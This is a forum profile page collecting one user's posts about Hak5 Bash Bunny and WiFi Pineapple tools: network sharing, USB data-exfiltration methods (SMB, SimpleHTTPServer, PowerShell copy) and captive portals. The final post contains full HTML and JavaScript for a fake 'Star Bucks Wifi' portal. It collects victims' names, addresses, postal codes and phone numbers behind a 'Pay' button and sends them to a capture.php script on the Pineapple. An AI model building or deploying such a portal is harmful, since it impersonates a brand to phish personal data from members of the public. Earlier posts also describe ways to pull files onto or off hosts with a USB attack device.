Jump to content

Mr.Pupp3T

Active Members
  • Posts

    28
  • Joined

  • Last visited

Posts posted by Mr.Pupp3T

  1. hey there this is really weird that this is happening, so i need inet connection on the BB to run the dsniff install well i put the BB into Ethernet mode then used my PCs ethernet to share the connection all seems good. Then about 5-10 seconds after sharing the connection the computer goes into a netio.sys Blue screen, tried many other computers an its all the same. i have a linux box, so i could try the inet share on there. 

  2. 16 hours ago, MaxDamage said:

    I have used the python SMB server like Darren did in the SMB_Exfil payload and then used Powershell to pull the file or run direct from the SMB share.

    So pretty much get the server setup and then tell it to take the file from my BB an copy it too the computer, because if the BB can access 172.16.64.1 like darren did it can copy that file from the bashbunny over to documents or whatever correcT?

  3. 5 hours ago, aramansky said:

    Hello everyone,

    I want to use my bashbunny with other keyboard layouts to execute some powershell code (via quack) on a windows box. 

    How do i specify another keyboard layout?

    Where can i get the /root/tools/languages/de.json (and ch, at, si, hr, pl) or other json files for any other keyboard layout?

     

    Thank you very much!

     

     

    So like you want the BB to type in Russian or Chinese, is that what you mean sir?

  4. 5 hours ago, JBNZ said:

    A simple and terrible example would be a payload which contained simply:

    
    ATTACKMODE ECM_ETHERNET
    python -m SimpleHTTPServer

    Once this executes, the full bunny filesystem is exposed to the target on on http://172.16.64.1:8000/, which is the bunny's default IP and SimpleHTTPServer's default port. Options to SimpleHTTPServer would let you better specify a directory to serve from and an alternative port.

     
    3 hours ago, MaxDamage said:

    I have used the python SMB server like Darren did in the SMB_Exfil payload and then used Powershell to pull the file or run direct from the SMB share.

    Hmm, I'll try an see what I can do with that maybe there is a way of blocking the rest? but yes I don't use bash a lot so that's why I'm asking for help :) so thanks, guys I really appreciate all your help!

     

     

  5. 12 hours ago, Dave-ee Jones said:

    Powershell would probably be the best way. Maybe not the most efficient...

    Create a powershell script that is run by the payload.txt that says something like:

    
    Copy-Item -Path "/root/testing/test.txt" -Destination [Environment]::GetFolderPath("MyDocuments") -Force

    Not sure if that will actually work as "/root/testing/text.txt" is a *nix path for the BB, you can't really access it from Windows Explorer...

    Yea that's what I was looking over I know you can access the libary file so maybe in there will work

  6. lol we dont do that here its all educationallessons here, an if you do the above your linux machine with be a paper weight pretty much........so dont do what they say above. There are stating to remove the root dic then mount a sda then unmount then pretty much a screen will say PWNED so yea, nothing here for hacking just lessons for educational 

  7. Hey everyone im gonna step away from the above list lol , kinda seems like hey im gonna tell you everything about my self. Well i like to keep to my self at times :P

     

    Well you Can call me Pupp3t or Zalure, and im an Network Systems Engineer at trade, and i have bought every Hak5 Pineapple that there is just because i like to have everything at my fingertips. Im currently making a Module that self learns. Like the Zero Day Virus that was made by the CIA for Iran. Been working on it for the last past 3 years. But hopefully it will be done soon. 

  8. You said you have it on bsttery. Use the supplied Y cable an plug both ends into the computer an then plug into nano an try connecting to SSID. If it works then you need a stronger battery like 4000MH or you need a better antenna like mine aren't the supplied ones. Oh reason. Why I ask you too connect both Y cables in is because normally wifi needs a lot power

     

     

  9. Hey guys so im working on a homepage for the captive portal and i have pretty much everything i need so far, but when i click my button to get to were i was, all it does it reload the page, im using the captive portal demo code that was posted with some extra stuff like background image and more text boxs. Any help would be greatly appreciated.

  10. Hey guys i watched a tut on youtube to get my captive portal working it it sumbits one line of text to a stored.txt file, but i wanna have more then one thing sent to the stored.txt file can anyone help this is the code im useing.

     

    <html>
    <head>
      <title>Star Bucks Wifi</title>
      <meta HTTP-EQUIV="Pragma" CONTENT="no-cache">
     
      <script type="text/javascript">
     
        function submitTextToCapture() {
     
          text = document.getElementById("textinput").value;
          text = document.getElementById("FirstName").value;
     
          window.location = "http://172.16.42.1/capture.php?text=" + text + "&redir=$authtarget";
     
        }
     
      </script>
     
    </head>
    <body bgcolor="#DDDDDD" text="#000000">
    <table border="0" cellpadding="2" cellspacing="0" width="100%">
    <tr>
      <td align=center>
      <h2>Star Bucks Wifi</h2>
      </td>
    </tr>
    <tr>
      <td align=center height="120">
     
    <form class="form-horizontal">
    <fieldset>
    
    <!-- Form Name -->
    <legend>Star Bucks Wifi</legend>
    
    <!-- Text input-->
    <div class="form-group">
      <label class="col-md-4 control-label" for="First Name">First name:</label>  
      <div class="col-md-4">
      <input id="FirstName" name="First Name" placeholder="Joe" class="form-control input-md" required="" type="text">
      <span class="help-block">Please Type Your First Name</span>  
      </div>
    </div>
    
    <!-- Text input-->
    <div class="form-group">
      <label class="col-md-4 control-label" for="">Last name:</label>  
      <div class="col-md-4">
      <input id="" name="" placeholder="Doe" class="form-control input-md" required="" type="text">
      <span class="help-block">Please Type Your Last Name</span>  
      </div>
    </div>
    
    <!-- Text input-->
    <div class="form-group">
      <label class="col-md-4 control-label" for="textinput">Address:</label>  
      <div class="col-md-4">
      <input id="textinput" name="textinput" placeholder="123 Fairly Lane" class="form-control input-md" required="" type="text">
      <span class="help-block">Please Type Your Address</span>  
      </div>
    </div>
    
    <!-- Text input-->
    <div class="form-group">
      <label class="col-md-4 control-label" for="textinput">Postal Code:</label>  
      <div class="col-md-4">
      <input id="textinput" name="textinput" placeholder="A1B-2C3" class="form-control input-md" required="" type="text">
      <span class="help-block">Please Type Your Postal Code</span>  
      </div>
    </div>
    
    <!-- Text input-->
    <div class="form-group">
      <label class="col-md-4 control-label" for="textinput">City/Town:</label>  
      <div class="col-md-4">
      <input id="textinput" name="textinput" placeholder="Toronto" class="form-control input-md" required="" type="text">
      <span class="help-block">What City or Town you Live In?</span>  
      </div>
    </div>
    
    <!-- Select Basic -->
    <div class="form-group">
      <label class="col-md-4 control-label" for="selectbasic">Province</label>
      <div class="col-md-4">
        <select id="selectbasic" name="selectbasic" class="form-control">
          <option value="1">Alberta</option>
          <option value="2">British Columbia</option>
          <option value="">Manitoba</option>
          <option value="">New Brunswick</option>
          <option value="">Newfoundland and Labrador</option>
          <option value="">Northwest Territories</option>
          <option value="">Nova Scotia</option>
          <option value="">Nunavut</option>
          <option value="">Ontario</option>
          <option value="">Prince Edward Island</option>
          <option value="">Quebec</option>
          <option value="">Saskatchewan</option>
          <option value="">Yukon Territory</option>
        </select>
      </div>
    </div>
    
    <!-- Text input-->
    <div class="form-group">
      <label class="col-md-4 control-label" for="textinput">Phone Number:</label>  
      <div class="col-md-4">
      <input id="textinput" name="textinput" placeholder="123-456-7890" class="form-control input-md" required="" type="text">
      <span class="help-block">Please Type Your Phone Number</span>  
      </div>
    </div>
    
    </fieldset>
    </form>
        <input type="text" id="userText" placeholder="enter some text" required>
        <button type="button" id="button" onclick="submitTextToCapture()">Pay</button>
     
        </form>
     
        <a href="$authtarget">
        </a>
      </td>
    </tr>
    </table>
    </body>
    </html>

     

×
×
  • Create New...